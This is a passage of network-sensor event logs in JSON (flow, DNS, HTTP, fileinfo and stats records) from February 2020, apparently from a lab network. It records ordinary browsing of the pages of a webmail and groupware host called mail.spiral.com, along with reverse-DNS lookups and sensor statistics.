{"timestamp":"2020-02-29T00:06:25.001840+0000","flow_id":1948590856745586,"event_type":"flow","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:24.471666+0000","end":"2020-02-29T00:01:24.576661+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:30.002978+0000","flow_id":83501324109156,"event_type":"flow","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":7936,"start":"2020-02-29T00:05:23.460132+0000","end":"2020-02-29T00:05:29.625666+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:30.700781+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:06:31.000843+0000","flow_id":943744603502432,"event_type":"flow","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:29.964448+0000","end":"2020-02-29T00:01:30.077302+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:06:31.436369+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18967,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:32.000213+0000","event_type":"stats","stats":{"uptime":14044,"capture":{"kernel_packets":133571,"kernel_drops":0},"decoder":{"pkts":133580,"bytes":92431195,"invalid":181,"ipv4":132127,"ipv6":8,"ethernet":133580,"raw":0,"null":0,"sll":0,"tcp":127024,"udp":4908,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2706,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2722,"synack":2713,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1749,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2238,"failed_udp":110},"tx":{"http":4535,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2315}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2285,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20431,"memcap_state":0,"memcap_global":0},"http"
:{"memuse":40143,"memcap":0}}} {"timestamp":"2020-02-29T00:06:35.851694+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:36.623375+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770}} 
{"timestamp":"2020-02-29T00:06:39.000306+0000","event_type":"stats","stats":{"uptime":14051,"capture":{"kernel_packets":133592,"kernel_drops":0},"decoder":{"pkts":133605,"bytes":92441637,"invalid":181,"ipv4":132150,"ipv6":8,"ethernet":133605,"raw":0,"null":0,"sll":0,"tcp":127044,"udp":4910,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2707,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2723,"synack":2714,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1750,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2239,"failed_udp":110},"tx":{"http":4536,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2316}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":108161,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:41.624581+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":42655,"tx_id":0}} {"timestamp":"2020-02-29T00:06:41.867378+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62371,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.066598+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273}} {"timestamp":"2020-02-29T00:06:42.582426+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48233,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.845851+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892}} 
{"timestamp":"2020-02-29T00:06:46.000415+0000","event_type":"stats","stats":{"uptime":14058,"capture":{"kernel_packets":133618,"kernel_drops":0},"decoder":{"pkts":133643,"bytes":92458310,"invalid":181,"ipv4":132188,"ipv6":8,"ethernet":133643,"raw":0,"null":0,"sll":0,"tcp":127078,"udp":4914,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2709,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2725,"synack":2716,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1752,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2241,"failed_udp":110},"tx":{"http":4538,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2318}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":137984,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:47.067491+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":25872,"tx_id":0}} {"timestamp":"2020-02-29T00:06:47.850714+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35875,"tx_id":0}} {"timestamp":"2020-02-29T00:06:48.000500+0000","flow_id":1275784246733683,"event_type":"flow","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1664,"bytes_toclient":7838,"start":"2020-02-29T00:05:42.404339+0000","end":"2020-02-29T00:05:47.657846+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:06:48.001717+0000","flow_id":448856997904054,"event_type":"flow","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:46.933558+0000","end":"2020-02-29T00:01:47.039247+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.002381+0000","flow_id":1377287193441638,"event_type":"flow","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:47.144742+0000","end":"2020-02-29T00:01:47.250009+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.579771+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:06:48.768128+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981}} {"timestamp":"2020-02-29T00:06:53.000179+0000","event_type":"stats","stats":{"uptime":14065,"capture":{"kernel_packets":133655,"kernel_drops":0},"decoder":{"pkts":133665,"bytes":92464732,"invalid":181,"ipv4":132208,"ipv6":8,"ethernet":133665,"raw":0,"null":0,"sll":0,"tcp":127096,"udp":4916,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2710,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2726,"synack":2717,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1753,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2242,"failed_udp":110},"tx":{"http":4539,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2319}},"flow_mgr":{"closed_pruned":2693,"ne
w_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20833,"memcap_state":0,"memcap_global":0},"http":{"memuse":52445,"memcap":0}}} {"timestamp":"2020-02-29T00:06:53.521339+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":0}} {"timestamp":"2020-02-29T00:06:53.530561+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36766,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:06:54.152239+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005}} {"timestamp":"2020-02-29T00:06:56.895861+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3163,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:57.151550+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:06:59.002238+0000","flow_id":2074880077357107,"event_type":"flow","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:58.221235+0000","end":"2020-02-29T00:01:58.332439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:59.155554+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} 
{"timestamp":"2020-02-29T00:07:00.000186+0000","event_type":"stats","stats":{"uptime":14072,"capture":{"kernel_packets":133702,"kernel_drops":0},"decoder":{"pkts":133714,"bytes":92495080,"invalid":181,"ipv4":132257,"ipv6":8,"ethernet":133714,"raw":0,"null":0,"sll":0,"tcp":127141,"udp":4920,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281